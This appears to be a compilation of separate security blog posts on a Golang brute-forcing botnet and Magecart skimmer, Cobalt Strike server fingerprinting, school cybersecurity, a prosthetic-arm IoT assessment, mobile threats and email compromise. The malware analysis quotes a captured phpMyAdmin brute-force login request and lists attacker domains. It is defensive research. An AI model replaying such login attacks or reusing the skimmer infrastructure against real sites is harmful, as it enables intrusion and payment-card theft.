E-commerce websites continue to be targeted by online criminals looking to steal personal and payment information directly from unaware shoppers. Recently, attacks have been conducted via skimmer, which is a piece of code that is either directly injected into a hacked site or referenced externally. Its purpose is to watch for user input, in particular around online shopping carts, and send the perpetrators that data, such as credit card numbers and passwords, in clear text.
Compromising e-commerce sites can be achieved in more than one way. Vulnerabilities in popular Content Management Systems (CMSes) like Magento, as well as in various plugins are commonly exploited these days. But because many website owners still use weak passwords, brute force attacks where multiple logins are attempted are still a viable option.
Our investigation started following the discovery of many Magento websites that were newly infected. We pivoted on the domain name used by the skimmer and found a connection to a new piece of malware that turned out to be a brute forcer for Magento, phpMyAdmin, and cPanel. While we can’t ascertain for sure whether this is how the skimmer was injected, we believe this may be one of many campaigns currently going after e-commerce sites.
The online store is running the Magento CMS and using the OneStepCheckout library to process customers’ shopping carts. As the victim enters their address and payment details, their data is exfiltrated via a POST request with the information in Base64 format to googletagmanager[.]eu. This domain has been flagged before as part of criminal activities related to the Magecart threat groups.
Using VirusTotal Graph, we found a connection between this e-commerce site and a piece of malware written in Golang, more specifically a network query from the piece of malware to the compromised website. Expanding on it, we saw that the malware was dropped by yet another binary written in Delphi. Perhaps more interestingly, this opened up another large set of domains with which the malware communicates.
The first part is a downloader we detect as Trojan.WallyShack that has two layers of packing. The first layer is UPX. After unpacking it with the default UPX, we get the second layer: an underground packer using process hollowing.
The downloader is pretty simple. First, it collects some basic information about the system, and then it beacons to the C2. We can see that the domain names for the panels are hardcoded in the binary:
The main goal of this element is to download and run a payload file:
Here the dropped payload installs itself in the Startup folder, by first dumping a bash script in %TEMP%, which is then deployed under the Startup folder. The sample is not packed, and looking inside, we can find artifacts indicating that it was written in Golang version 1.9. We detect this file as Trojan.StealthWorker.GO.
The procedure of reversing will be similar to what we have done before with another Golang sample. Looking at the functions with prefix “main_”, we can distinguish the functions that were part of the analyzed binary, rather than part of statically-linked libraries.
We found several functions with the name “Brut,” suggesting this piece of malware is dedicated to brute forcing.
This is the malware sample that communicated with the aforementioned compromised e-commerce site. In the following section, we will review how communication and tasks are implemented.
Bot communication and brute forcing
Upon execution, the Golang binary will connect to 5.45.69[.]149. Checking that IP address, we can indeed see a web panel:
The bot proceeds to report the infected computer is ready for a new task via a series of HTTP requests announcing itself and then receiving instructions. You can see below how the bot will attempt to brute force Magento sites leveraging the /downloader/directory point of entry:
Brute force attacks can be quite slow given the number of possible password combinations. For this reason, criminals usually leverage CMS or plugin vulnerabilities instead, as they provide a much faster return on investment. Having said that, using a botnet to perform login attempts allows threat actors to distribute the load onto a large number of workers. Given that many people are still using weak passwords for authentication, brute forcing can still be an effective method to compromise websites.
Attack timeframe and other connections
We found many different variants of that Golang sample, the majority of them first seen in VirusTotal in early February (hashes available in the IOCs section below).
Checking on some of these other samples, we noticed that there’s more than just Magento brute forcing. Indeed, some bots are instead going after WordPress sites, for example. Whenever the bot checks back with the server, it will receive a new set of domains and passwords. Here’s an example of brute forcing phpMyAdmin:
POST: set_session=&pma_username=Root&pma_password=Administ..&server=1&target= index.php&token= User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
As we were investigating this campaign, we saw a tweet by Willem de Groot noting a recent increase in skimmers related to googletagmanager[.]eu, tied to Adminer, a database management utility. The shopping site on which we started our research was compromised only a few days ago. Without server logs and the ability to perform a forensic investigation, we can only assume it was hacked in one of many possible scenarios, including the Adminer/MySQL flaw or brute forcing the password.
There are many different weaknesses in this ecosystem that can be exploited. From website owners not being diligent with security updates or their passwords, to end users running infected computers turned into bots and unknowingly helping to hack web portals.
As always, it is important to keep web server software up-to-date and augment this protection by using a web application firewall to fend off new attacks. There are different methods to thwart brute force attacks, including the use of the .htaccess file to restrict which IP address is allowed to log in.
Skimmers are a real problem for online shoppers who are becoming more and more wary of entering their personal information into e-commerce websites. While victims may not know where and when theft happened, it does not bode well for online merchants when their platform has been compromised.
Malwarebytes detects the malware used in these attacks and blocks the skimmer gate.
With additional contributions from @hasherezade.
Indicators of Compromise (IOCs)
snaphyteplieldup[.]xyz tolmets[.]info serversoftwarebase[.]com
Similar Golang bruteforcers
46fd1e8d08d06cdb9d91e2fe19a1173821dffa051315626162e9d4b38223bd4a 05073af551fd4064cced8a8b13a4491125b3cd1f08defe3d3970b8211c46e6b2 fdc3e15d2bc80b092f69f89329ff34b7b828be976e5cbe41e3c5720f7896c140 96a5b2a8fdc28b560f92937720ad0dcc5c30c705e4ce88e3f82c2a5d3ad085aa 81bd819f0feead6f7c76da3554c7669fbc294f5654a8870969eadc9700497b82 5e7581e3c8e913fe22d56a3b4b168fd5a9f3f8d9e0d2f8934f68e31a23feabd5 d87b4979c26939f0750991d331896a3a043ecd340940feb5ac6ec5a29ec7b797 36d62acd7aba4923ed71bfd4d2971f9d0f54e9445692b639175c23ff7588f0a7 7db29216bcb30307641b607577ded4a6ede08626c4fa4c29379bc36965061f62 4e18c0b316279a0a9c4d27ba785f29f4798b9bbebb43ea14ec0753574f40a54f 91a696d1a0ef2819b2ebb7664e79fa9a8e3d877bedcb5e99f05b1dc898625ed5 8b1b2dee404f274e90bd87ff6983d2162abee16c4d9868a10b802bd9bcbdbec6 046c5b18ec037ec5fbdd9be3e6ee433df3e4d2987ee59702b52d40e7f278154d 6b79345a2016b2822fd7f7bed51025b848b37e026d4638af59547e67078c913e 181ebf89a32a37752e0fc96e6020aa7af6dbb00ddb7ba02133e3804ac4d33f43 5efd1a27717d3e41281c08f8c048523e43b95300fb6023d34cb757e020f2ff7f 5dccce9b5611781c0edee4fae015119b49ce9eb99ee779e161ec0e75c1c383da
The post New Golang brute forcer discovered amid rise in e-commerce attacks appeared first on Malwarebytes Labs.
There's a new Linux security tool you should be aware of — Cmd (pronounced "see em dee") dramatically modifies the kind of control that can be exercised over Linux users. It reaches way beyond the traditional configuration of user privileges and takes an active role in monitoring and controlling the commands that users are able to run on Linux systems.
Provided by a company of the same name, Cmd focuses on cloud usage. Given the increasing number of applications being migrated into cloud environments that rely on Linux, gaps in the available tools make it difficult to adequately enforce required security. However, Cmd can also be used to manage and protect on-premises systems.
With FIDO2 certification for Android, Google is setting the stage for password-less app and website sign-ins on a billion devices
The post Google aims for password-free app and site logins on Android appeared first on WeLiveSecurity
Microsoft CEO Satya Nadella seems to agree with Apple CEO Tim Cook when it comes to privacy, calling this a “fundamental human right.”
Microsoft CEO: Privacy a 'human right'
Despite the lack of a successful smartphone franchise, Microsoft is still very much part of today’s industry with a range of services across the mobile ecosystem. That’s probably why Nadella is such an active attendee at Mobile World Congress 2019.
What’s really interesting about what he said during a speech at the show is the extent to which his thinking aligns with what Apple is doing around privacy. For example:
If iTunes and Google Play aren't your thing, click here.
Ep. #47 show notes:Recorded Feb. 15, 2019
We are joined by special guest Michelle Dennedy, a vice president and the chief privacy officer at Cisco. This is a long episode that is worth every minute — covering everything from the modern privacy landscape, privacy as a fundamental human right, and all the ways you didn’t know underwear can protect you. We were a bit concerned about having a VP on, but after Michelle knocked us around a bit we figured out what was up. However, if this is the last EP you see listed, I think we all know what happened.
The topics01:15 — Roundtable: Hi Michelle, let’s talk about Nessun dorma.
14:00 — Privacy is a fundamental human right
21:00 — The Privacy Lorax, the Privacy Nihilist, and universal identity
29:30 — Starting with morality and ethics instead of commercialization and legality
37:00 — Putting data on the balance sheet: The privenomics of information
52:00 — Who is Mitch? and the panty rules of passwords
55:00 — Michelle’s projects and book (you can get a free copy!)
1:01:30 — Can security and laws keep pace with privacy needs?
1:10:00 — Give me back my OJ, Senator.
1:13:00 — My dudes, Mitch Pinkerton rides again
1:17:00 — More cover fire: The rest of the underwear rules
1:20:00 — Closing thoughts and parting shots
The linksMarc Martel, "The Mercurotti"
Okamoto Tomotaka, Nessun dorma
David the Hairdresser, Nessun dorma
Aretha Franklin, Nessun dorma
Privacy Engineer’s Manifesto (also free for Kindle and Nook)
Cisco calls for privacy as a basic human right
Cisco Trust Center
Special Guest: Michelle Dennedy, VP and Chief Privacy Officer at Cisco (@mdennedy)
Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.
Subscribe via iTunes (and leave a review!)
Check out the Talos Threat Research Blog
Subscribe to the Threat Source newsletter
Follow Talos on Twitter
Give us your feedback and suggestions for topics:
How an anomalous space led to fingerprinting
On the 2nd of January 2019 Cobalt Strike version 3.13 was released, which contained a fix for an “extraneous space”. This uncommon whitespace in its server responses represents one of the characteristics Fox-IT has been leveraging to identify Cobalt Strike Servers, with high confidence, for the past one and a half year. In this blog we will publish a full list of servers for readers to check against the logging and security controls of their infrastructure.
Cobalt Strike is a framework designed for adversary simulation. It is commonly used by penetration testers and red teamers to test an organization’s resilience against targeted attacks, but has been adopted by an ever increasing number of malicious threat actors.
Subtle anomalies like these should not be underestimated by blue teams when it comes to combating malicious activity.
About Cobalt Strike
Cobalt Strike is a framework designed for adversary simulation. It is commonly used by penetration testers and red teamers to test an organization’s resilience against targeted attacks. It can be configured using Malleable C&C profiles which can be used to customize the behavior of its beacon, giving users the ability to emulate the TTP’s of in the wild threat actors. The framework is commercially and publicly available, which has also led to pirated/cracked versions of the software.
Though Cobalt Strike is designed for adversary simulation, somewhat ironically the framework has been adopted by an ever increasing number of malicious threat actors: from financially motivated criminals such as Navigator/FIN7, to state-affiliated groups motivated by political espionage such as APT29. In recent years, both red teams and threat actors have increasingly made use of publicly and commercially available hacking tools. A major reason for this is likely their ease of use and scalability. This two-sided element of pentesting suites makes it a critical avenue for threat research.
Cobalt Strike Team Servers
While the implant component of Cobalt Strike is called the “beacon”, the server component is referred to as the “team server”. The server is written in Java and operators can connect to it to manage and interact with the Cobalt Strike beacons using a GUI. On top of collaboration, the team server also acts as a webserver where the beacons connect to for Command & Control, but it can also be configured to serve the beacon payload, landing pages and arbitrary files.
Communication to these servers can be fingerprinted with the use of Intrusion Detection System (IDS) signatures such as Snort, but with enough customization of the beacon, and/or usage of a custom TLS certificate, this becomes troublesome. However, by applying other fingerprinting techniques (as described in the next section) a more accurate picture of the Cobalt Strike team servers that are publicly reachable can be painted.
Identifying Cobalt Strike Team Servers
One of Fox-IT’s InTELL analysts, with a trained eye for HTTP header anomalies, spotted an unusual space in the response of a Cobalt Strike team server in one of our global investigations into malicious activity. Though this might seem irrelevant to a casual observer, details such as these can make a substantial difference in combating malicious activity, and warranted additional research into the set-up of the team servers. This ultimately led to Fox-IT being able to better protect our clients from actors using Cobalt Strike.
The webserver of the team server in Cobalt Strike is based on NanoHTTPD, an opensource webserver written in Java. However this webserver unintendedly returns a surplus whitespace in all its HTTP responses. It is difficult to see at first glance, but the whitespace is there in all the HTTP responses from the Cobalt Strike webserver:
Using this knowledge it is possible to identify NanoHTTPD servers, including possible Cobalt Strike team servers. We found out that public NanoHTTPD servers are less common than team servers. Even when the team server uses a Malleable C2 Profile, it is still possible to identify the server due to the “extraneous space”.
The “extraneous space” was fixed in Cobalt Strike 3.13, released on January 2nd of 2019. This means that this characteristic was in Cobalt Strike for almost 7 years, assuming it used NanoHTTPD since the first version, released in 2012. If you look carefully, you can also spot the space in some of the author’s original YouTube videos, dating back to 2014.
The fact that the removal of this space is documented in the change log leads us to believe that the Cobalt Strike developers have become aware of the implications of such a space in the server response, and its potential value to blue teams.
The change log entry highlighted above refers to the removed space being “extraneous”, in a literal sense meaning not pertinent or irrelevant. Due to its demonstrated significance as fingerprinting mechanism, this description is contested here.
Scanning and results
By utilizing public scan data, such as Rapid7 Labs Open Data, and the knowledge of how to fingerprint NanoHTTPD servers, we can historically identify the state of publicly reachable team servers on the Internet.
The graphs shows a steady growth of Cobalt Strike (NanoHTTPD) webservers on port 80 and 443 which is a good indication of the increasing popularity of this framework. The decline since the start of 2019 is most likely due to the “extraneous space” fix, thus not showing up in the scan data when applying the fingerprint.
In total Fox-IT has observed 7718 unique Cobalt Strike team server or NanoHTTPD hosts between the period of 2015-01 and 2019-02, when based on the current data (as of 26 Feb 2019) from Rapid7 Labs HTTP and HTTPS Sonar datasets.
The table below contains several examples of Cobalt Strike team servers, used by malicious threat actors:
|IP Address||First seen||Last seen||Actor|
The full list of Cobalt Strike team servers identified using this method can be found on the following Fox-IT GitHub Repository.
Do note that possible legitimate NanoHTTPD servers are listed here and that some IP addresses may have been rotated and reused swiftly, for example due to being part of Amazon or Azure cloud infrastructure.
Therefore we recommend to investigate connections to these IP addresses within the corresponding time ranges. A starting point is to verify whether requested URI matches a Cobalt Strike beacon checksum, or by using historical DNS data using passive DNS. Going beyond this can be done in various ways and we challenge readers to use their investigative creativity.
Please also note that this list contains servers of both legitimate and illegitimate operations, since these cannot be distinguished easily. Fox-IT recognizes the merit of building and distributing offensive tooling, particularly for security testing purposes. In our opinion the benefits of publishing this list (allowing everyone to detect unwanted attacks retroactively) outweigh the downsides, which could include potentially affecting ongoing red team operations. We believe that we all have an interest in raising the bar of security operations, and therefore increasing visibility across the board will inform a higher level of operational security and awareness on all sides.
Network IDS Signatures
Fox-IT developed a Snort rule for network detection. The rule checks for the “extraneous space” in the HTTP header. Please note that this detection rule only works to detect plaintext HTTP traffic to and from Cobalt Strike Team servers with the Cobalt Strike version up until release 3.13. Nevertheless, this is still a valuable detection rule, considering threat actors tend to use pirated and cracked- and therefore inherently unsupported- versions.
- Organizations are encouraged to use the published list with Cobalt Strike team servers IP addresses to retroactively verify whether they have been targeted with this tooling by either a red team or an adversary in the recent past. The IP addresses can be checked with e.g. firewall and proxy logs, or on aggregate against SIEM data. To minimize the amount of false positives, the reader is urged to take the corresponding first and last seen dates into consideration.
- For the ‘red team readers’ of this blog looking for ways to avoid their Cobalt Strike team server being both publicly available and easy to fingerprint, see the Cobalt Strike Team Server Population Study blog for a detailed set of mitigations. Furthermore, Red Teams are encouraged to critically examine their toolsets in use or rely on their Blue Team, for potential tell-tales and determine the appropriate way to apply and mitigate such findings for both Red and Blue team purposes.
Watch this space (pun intended) for further analysis on this subject.
Vulnerabilities affect all four major mobile carriers in the USA
Crumbling infrastructure. Gaps in curriculum. Antiquated devices. Difficult COPPA laws. Lack of funding. Those are just a few of the obstacles facing K–12 schools looking to adopt technology into their 21st century learning initiatives.
Now add security concerns to the list, and you can see why many schools struggle not only to keep up with consumer technology trends, but also protect against threats that target them.
Despite the uphill battle, schools know the importance of securing their students’ data, and many have found ways to safely incorporate cybersecurity awareness, as well as affordable technologies, to protect that data. We talked with members of the school board, administrators, educators, and security directors to discuss the cybersecurity challenges specific to K–12 schools (both private and public), and what can be done to overcome.
In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. However, when we zoomed in to look at the major threats that dominated in 2018, including information-stealing Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.
In addition to K–12 school systems, key academic services, such as the SAT and ACT, are susceptible to data breaches, which can undermine the legitimacy of the college admissions process.
US schools are data-rich targets for cybercriminals, including the names, Social Security Numbers, and email addresses of students, their academic and health records, financial information, and more. According to EdWeek, US K–12 schools have experienced 425 publicly-reported cybersecurity incidents since January 2016; the real number is likely much higher.
Digging into this data, presented on an interactive map from the K–12 Cybersecurity Resource Center (pictured below), schools were most impacted by data breaches (purple flags), phishing attacks (blue), and ransomware infections (yellow).
Knowing they’re a target for threat actors, which major hurdles must schools jump over in order to shore up their cybersecurity?
The first is lack of professional development. Teachers, administrators, and support staff have access to highly-confidential student data that is housed online, and because they don’t know enough about cybersecurity, they can inadvertently allow for a breach. Yet, professional development is nearly always related to changes in curriculum adoption, school events, and the occasional technology training course on how to use a particular software program or Internet-connected classroom device, such as a smart board.
In a related issue, while students are typically far more tech-savvy than their teachers, they are often not taught fundamental cybersecurity awareness at home.
“We might assume that when students get devices from home, such as phones or tables, there are restrictions put in place or guidelines given, but very often, there are not,” said Tami Espinosa, Principal of Luigi Aprea Elementary School in Gilroy, CA. “We need to be sure to address how to properly use technology, because it is and will be such an integral part of their lives.”
Even if filters or other restrictions are put in place, many students are able to find ways around them, compromising security in the process. If they knew their actions could lead to their student records being accessed and changed, would they be so reckless?
Another challenge for shoring up cybersecurity in K–12 is a lack of funding. In a nutshell, there is none—or at least very little. What is available is usually applied directly to instruction and curriculum, as many in the school community don’t support diverting funds away from core subject areas.
“Cybersecurity isn’t a tangible item that directly impacts instruction, so many staff and community members wouldn’t support money going towards it, especially when facilities need to be fixed, curriculum needs to be purchased, and more support staff is needed,” said Tami Ortiz, a San Francisco Bay Area educator. “Cybersecurity is vital, but invisible.”
In fact, because the district or federal funding often doesn’t come through for cybersecurity, schools looking for funds often have to apply for grants or host fundraising events to subsidize.
Finally, updating infrastructure is a massive obstacle for schools hoping to tighten up security. Pubic schools especially struggle in this area, as it’s expensive to overhaul hardware every few years and requires support staff that can manage and secure not only the devices, but also any data stored on premise or in the cloud. From operating systems to specialized educational software that needs updating, vulnerabilities are rampant and can be easily exploited—and that’s without including negligent staff who might open an unwanted email and infect their machine.
To help persuade community members and staff to divert funds, the severity of the situation must be impressed upon them. According to The 2018 State of K–12 Cybersecurity report, nearly half of the reported breaches of the year were caused by students and staff, and 60 percent of them resulted in student data being compromised.
This tells us that awareness is a key factor in combatting breaches, but also that technologies must be deployed in order to safeguard from tech-savvy students looking to get around the protections put in place.
Doron Aronson, Vice President of the Cambrian School Board of Trustees, said that with their limited budgets, school boards look at technology holistically, with security being an important component. There are three main areas they consider when making funding decisions: infrastructure, hardware, and security; instructional practices and professional learning; and digital curriculum, tools, data and assessment. And while security is mentioned only as part of infrastructure, it can actually be incorporated into all three areas. Here’s how:
Infrastructure, hardware, and security
One of the “easiest” ways that schools can combat data breaches and other cyberattacks is by selecting and deploying cybersecurity solutions that combat threats which have historically targeted schools. IT directors should look for programs with dynamic, behavior-based detection criteria that shield from ransomware, Trojans, and other active malware families. Firewalls, supplementary email security, and encrypted data storage/backup systems provide additional coverage against breaches, phishing, and ransomware attacks.
In addition, developing a cybersecurity policy and incident response plan will help prepare schools in the event of a breach. Bonus points for incorporating a layer of security with top remediation capabilities, so that the aftermath, including restoring backups and cleaning up computers, is relatively painless.
Instructional practices and professional learning
Convince leadership to provide outsourced IT and security services, especially for professional development. Start by partnering outsider trainers with those who know the most—the IT/tech department—and then move on to administration, staff, paraprofessionals, and aides.
Fresno-based educational consultant Alex Chavez advises schools to “get serious about security. Put it on the leadership meeting agenda next to school site safety. Collaborate with the outsourced security to keep up-to-date with the latest threats and best practices.”
If funding for outside awareness training is non-existent, designate or ask for a volunteer to be the cyber coordinator for the school. Look to your community for volunteers: tech-savvy younger teachers, or parents who work in technology or security would be a good place to start.
“Get some trusted outside help,” said John Donovan, Head of Security at Malwarebytes. “Designate someone on your staff to be an internal leader/point of contact, and give them some time and incentives to learn and bring that info to your school—especially if it’s a volunteer position.”
Do the same within your student body. Designate a classroom cyberhero, or select a few older students to be the cyber police for the school. Reward with extra credit, less homework, or a points system within the school for getting swag.
Once staff and volunteers have had some initial training, broaden that training out to the wider school and community by offering both formal and informal lessons, including assembly talks and workshops, and occasionally testing that knowledge through simple, fun exercises.
Digital curriculum, tools, data, and assessment
Putting the infrastructure in place, including the right antivirus software, cybersecurity policies, and support staff (volunteer or professional), plus providing professional development are steps in the right direction to shoring up cybersecurity in our elementary, middle, and high schools. However, perhaps the most important step is knowing what to teach students and teachers alike about cybersecurity hygiene, and how best to teach it.
“My advice would be to make sure there is a plan in place for the intentional teaching of cyber safety,” said Espinosa. “So often we think a lot of this is common sense, however, it is not.”
To that end, we suggest the following best practices, especially relevant to those in education:
- Install security software on all endpoints in the school environment, including mobile devices teachers may use to check their emails during the day.
- Beware of phishing emails and other social engineering, such as technical support scams or video game games, aimed at both teachers and students. Look at the sender’s email address and be hyper aware if there are attachments or links within the body of the email asking for personal information.
- Student data should be backed up and encrypted end-to-end in storage and in transmission.
- Use or create digital curriculum that is COPPA compliant.
- Use password managers for any teacher, administrator, or even student accounts.
- Keep all software and hardware updated regularly. Systems and software that have reached end of life (EOL) and are no longer supported with security updates should be purged and replaced.
How to teach it
- Incorporate cybersecurity hygiene into digital citizenship discussions, as well as digital literacy learning.
- Make cybersecurity part of curriculum that aligns to state standards for ELA or even math by assimilating knowledge about threats, hackers, or other online dangers into reading comprehension instruction, word problems, or even project-based learning activities.
- Create gamified lessons, such as phishing tests.
- Offer rewards for good cybersecurity hygiene, such as stars or points for logging out of accounts before closing browsers.
- Assign cybersecurity as a research topic for reports.
Engaging students in cybersecurity: a primer for educators
Stop, Think, Connect
US Department of Homeland Security
Stay Safe Online/National Cyber Security Awareness Month
National Cyber Security Alliance
Privacy and Internet Safety
Common Sense Media
Framework for Improving Critical Infrastructure Cybersecurity
National Institute of Standards and Technology
The IoT world has long since grown beyond the now-ubiquitous smartwatches, smartphones, smart coffee machines, cars capable of sending tweets and Facebook posts and other stuff like fridges that send spam. Today’s IoT world now boasts state-of-the-art solutions that quite literally help people. Take, for example, the biomechanical prosthetic arm made by Motorica Inc. This device helps people who have lost their limb to restore movement.
Via dedicated sensors, the biomechanical prosthetic arm reads the muscle contraction parameters and analyzes them to produce movements with the robotic fingers. The arm takes little time to get used to standard movements, after which it becomes a full-fledged assistant.
Like other IoT devices, the prosthetic arm sends statistics to the cloud, such as movement amplitudes, the arm’s positions, etc. And just like other IoT devices, this valuable invention must be checked for vulnerabilities.
In our research, we focused on those attack vectors that can be implemented without the arm owner’s knowledge. Below is a standard diagram of the arm’s interactions with the outside world.
Each arm is equipped with an embedded SIM card for sending statistical data. The SIM is needed to access the internet and send statistics and other information about the arm’s status. A connection is established to Motorica’s remote cloud, which is an interface for remotely monitoring the status of all registered biomechanical arms. Good thing about the arm’s current architecture – the connection between the arm and the cloud in unidirectional. This means that only the arm is sending data to the cloud, while the cloud sends nothing back. Yet, Motorica Inc says, they plan to implement this feature later.
The basic logic of the arm, such as movement directions, switching motors on or off, etc., are implemented in the C language. The cloud for receiving, processing and storing information is implemented based on the following technologies:
- NodeJS – for backend,
- ReactJS – for frontend,
- MongoDB – database.
At first, we decided to attack the logic of the arm. But soon we discovered that the C code is well-structured and has no vulnerabilities in it. However, the arm that we tested has only the basic functionality. Motorica Inc. wants to add more functions to its biomechanical limbs: smartphone interconnect, contactless payments and other useful features. From our point of view, all these new technologies must be tested for cybersecurity. Especially the ones that could be exploited for MiTM attacks.
Then we started to analyze the protocol used to send the statistics to the cloud and the logic for processing that information on the server. The initial findings showed that the data was sent using the insecure HTTP protocol. A little later we found some incorrect account operations and insufficient input validation that can be used by a remote attacker to:
- gain access to information about all the accounts in the cloud including the logins and passwords (in plaintext) for all the prosthetic arms and administrators,
- add or delete regular and privileged users (with administrator rights),
- launch attacks against administrators via the cloud and then attack Motorica’s internal infrastructure,
- cause denial of service for cloud administrator.
In our research we did not go deep into data analysis transferred between muscle sensors and the arm itself or study how the device is interconnected with contactless payment systems or smartphones. These look like very promising research fields for the next years.
What type of attackers might be interested in such attacks – getting prosthetic arm’ data? It’s difficult to say at this moment. However, when biomechanical limbs become more intelligent – attacks could be more beneficial to their perpetrators. Or, when it gets connected to the neuro-implanted brain-chip, the remote attacker will get access to something more valuable than money. Anyway, all IoT devices (and especially biomechanical ones) should be tested for cybersecurity issues at every stage of development.
If you create amazing technologies that are bigger and more important than just classical IoT devices, that help people, or even save lives – you have to check how your technology works, and whether there is a chance to attack your device and damage people. To prevent basic vulnerabilities, please follow the best coding practices, implement SDL, do security source code review, create a security champion in your development team, do external vulnerability researches and penetration testing. All these useful and much needed steps will increase the cybersecurity level of your devices and technologies.
Jeremy Fleming believes that China's technology challenge is much larger than Huawei's current dispute with the USA
These days, we seem to have a newfound reliance on all things ‘smart.’ We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet with no sign of slowing down. This is largely because smart devices make our lives easier and enjoyable. But even though these devices are convenient, it’s important to understand they’re also convenient for cybercriminals, given they contain a treasure trove of personal data. To examine how exactly these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year’s Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let’s take a look at these trends and how you can keep all your devices protected.
Operations RedDawn and FoulGoal
In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.
The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.
A Virtual Backdoor
Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs a SMiShing campaign that tricks users into downloading fake voice-messaging apps.
These virtual backdoors are now an ever-growing threat as hackers begin to take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through apps stores, like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites to conceive a socially engineered attack to trick users into enabling unknown sources.
The Voice Heard Around the Home
Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.
For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.
The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:
- Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
- Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity, comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router-level.
- Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
- Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.
The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.
Email scams and social engineering attacks are a huge security risk. When we describe security incidents that involve criminals scamming individuals or businesses out of money, security professionals often use terms like “CEO fraud”, “fake boss scams”, or “impersonation fraud” and “business email compromise” interchangeably for convenience. But there’s a case for treating business email compromise as a specific threat that deserves special attention.
Let’s put this into context. Phishing scams in general, and CEO fraud in particular, have the same goals: to convince you that the sender is genuine and then to trick you into doing something they want. Wombat Security’s State of the Phish 2019 report showed the scale of the risk. It surveyed almost 15,000 infosec professionals and found that almost all said the rate of phishing email incidents grew or stayed the same as last year. Last year, 83 per cent said they experienced phishing, up from 76 per cent in 2017.
The Wombat report said that attacks have one of three impacts on victims: credential compromise, malware infections and data loss. Credential compromise increased by more than 70 per cent since 2017, becoming the most commonly experienced impact in 2018. As Wombat noted, this is worrying because multiple services often sit behind a single password. Reports of data loss grew more than threefold since 2016. All three impacts have grown since 2016.
Won’t get fooled again
After analysing over a billion emails daily, Proofpoint concluded that attackers increasingly focus attention on people, rather than technical defences. “Attackers are adept at exploiting our natural curiosity, desire to be helpful, love of a good bargain, and even our time constraints to persuade us to click,” its report said.
Before scammers get to the serious business of extracting our money or making us download malware, scam emails have to pass the smell test by seeming legitimate (if it smells of ‘phish’ it probably is a ‘phish’). Most of them do this with simple spoofing techniques. They might involve misspelling the company name in a fake email domain or amending the email address slightly so it appears normal but is sent somewhere else. These tricks rely on people being so busy that they don’t spot the difference. The fake just needs to be good enough to fool the naked eye, and maybe also be smart enough to get past a basic email gateway.
But here’s where I believe there’s a distinction with business email compromise that many people are missing. Email spoofing is one thing, but what if an attacker actually took control of your email account? Think about the impact of that for a moment. An email account is the source of so much data about a person, it’s the proverbial keys to the kingdom.
Email has all the trappings of how we “speak” virtually to our contacts, from introductions (“Dear valued customer”), to signoffs (“Best wishes, Dave”). That’s a goldmine for any attacker who wants a foolproof way of impersonating someone and copy your style and email writing tone. From a business point of view, an email account will have contact details for clients and colleagues ready to hand.
A day in the life
Think of the potential damage to business relationships. How long would it take to send damaging emails to destroy your credibility, your career, or even your company? The attacker is no longer just impersonating you – as far as the email proves, they are you. And you, as the victim might not even realise you’ve been compromised right away. An attacker who takes over your account could send stealthy emails to a manager or customer and then delete all traces of it from the ‘sent items’ folder. Imagine if they found an old message with company product plans or sales prospects; where might that end up?
And that’s not all; think for a moment how much information your email account has on all of your other activities, from utility bills to records of purchases. Email’s tentacles reach into so many parts of our digital lives.
For just about every online service we use, where do all the password resets go? That’s right, to your email account.
Password honey pot
